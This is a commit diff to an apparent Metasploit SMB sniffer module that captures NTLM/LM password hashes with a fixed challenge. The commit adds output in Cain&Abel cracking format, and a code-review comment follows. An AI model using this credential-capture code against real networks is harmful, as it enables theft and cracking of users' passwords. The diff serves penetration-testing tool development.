Add PWFILE for Cain&Abel compatibility (thanks grutz!)
git-svn-id: file:///home/svn/framework3/trunk@5966 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
5dda7392f9
commit
f54d91c53d
|
@ -52,12 +52,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('LOGFILE', [ true, "The local filename to store the captured hashes", "smb_sniffer.log" ])
|
OptString.new('LOGFILE', [ false, "The local filename to store the captured hashes", nil ]),
|
||||||
|
OptString.new('PWFILE', [ false, "The local filename to store the hashes in Cain&Abel format", nil ])
|
||||||
], self.class )
|
], self.class )
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
|
@challenge = "\x11\x22\x33\x44\x55\x66\x77\x88"
|
||||||
exploit()
|
exploit()
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -100,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID']
|
smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID']
|
||||||
|
|
||||||
# The hardcoded challenge value
|
# The hardcoded challenge value
|
||||||
challenge = "\x11\x22\x33\x44\x55\x66\x77\x88"
|
challenge = @challenge
|
||||||
|
|
||||||
group = ''
|
group = ''
|
||||||
machine = smb[:nbsrc]
|
machine = smb[:nbsrc]
|
||||||
|
@ -221,23 +223,40 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
:type => "smb_domain",
|
:type => "smb_domain",
|
||||||
:data => smb[:domain]
|
:data => smb[:domain]
|
||||||
) if (smb[:domain] and smb[:domain].strip.length > 0)
|
) if (smb[:domain] and smb[:domain].strip.length > 0)
|
||||||
|
|
||||||
fd = File.open(datastore['LOGFILE'], "a")
|
|
||||||
fd.puts(
|
|
||||||
[
|
|
||||||
smb[:nbsrc],
|
|
||||||
smb[:ip],
|
|
||||||
smb[:username] ? smb[:username] : "<NULL>",
|
|
||||||
smb[:domain] ? smb[:domain] : "<NULL>",
|
|
||||||
smb[:peer_os],
|
|
||||||
nt_hash ? nt_hash : "<NULL>",
|
|
||||||
lm_hash ? lm_hash : "<NULL>",
|
|
||||||
Time.now.to_s
|
|
||||||
].join(":").gsub(/\n/, "\\n")
|
|
||||||
)
|
|
||||||
fd.close
|
|
||||||
|
|
||||||
|
|
||||||
|
if(datastore['LOGFILE'])
|
||||||
|
fd = File.open(datastore['LOGFILE'], "a")
|
||||||
|
fd.puts(
|
||||||
|
[
|
||||||
|
smb[:nbsrc],
|
||||||
|
smb[:ip],
|
||||||
|
smb[:username] ? smb[:username] : "<NULL>",
|
||||||
|
smb[:domain] ? smb[:domain] : "<NULL>",
|
||||||
|
smb[:peer_os],
|
||||||
|
nt_hash ? nt_hash : "<NULL>",
|
||||||
|
lm_hash ? lm_hash : "<NULL>",
|
||||||
|
Time.now.to_s
|
||||||
|
].join(":").gsub(/\n/, "\\n")
|
||||||
|
)
|
||||||
|
fd.close
|
||||||
|
end
|
||||||
|
|
||||||
|
if(datastore['PWFILE'] and smb[:username] and lm_hash)
|
||||||
|
fd = File.open(datastore['PWFILE'], "a")
|
||||||
|
fd.puts(
|
||||||
|
[
|
||||||
|
smb[:username],
|
||||||
|
smb[:domain] ? smb[:domain] : "NULL",
|
||||||
|
@challenge.unpack("H*")[0],
|
||||||
|
lm_hash ? lm_hash : "0" * 32,
|
||||||
|
nt_hash ? nt_hash : "0" * 32
|
||||||
|
].join(":").gsub(/\n/, "\\n")
|
||||||
|
)
|
||||||
|
fd.close
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
pkt = CONST::SMB_BASE_PKT.make_struct
|
pkt = CONST::SMB_BASE_PKT.make_struct
|
||||||
smb_set_defaults(c, pkt)
|
smb_set_defaults(c, pkt)
|
||||||
|
|
||||||
|
|
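Review bot: In the new PWFILE block, `smb[:username]` and `smb[:domain]` are joined with ":" after only "\n" is escaped, so a value containing ":" or "\r" shifts the columns of the record for whatever parses the file; these fields appear to come from the remote client, so normalise each one before the join, for example `field.to_s.gsub(/[:\r\n]/, '_')`. The fallback `lm_hash ? lm_hash : "0" * 32` can never fire, because the guard on the same block already requires `lm_hash`; either drop the fallback or add a comment saying which case the guard is meant to exclude. Both the LOGFILE and PWFILE writes leave the handle open if `puts` raises, whereas the block form `File.open(datastore['PWFILE'], "a") { |fd| fd.puts(line) }` closes it on every path. The files hold captured password hashes, so an explicit mode argument such as `File.open(path, "a", 0600)`, or a comment stating the intended permissions, would keep them from depending on the caller's umask. The enclosing method starts and ends outside the hunk.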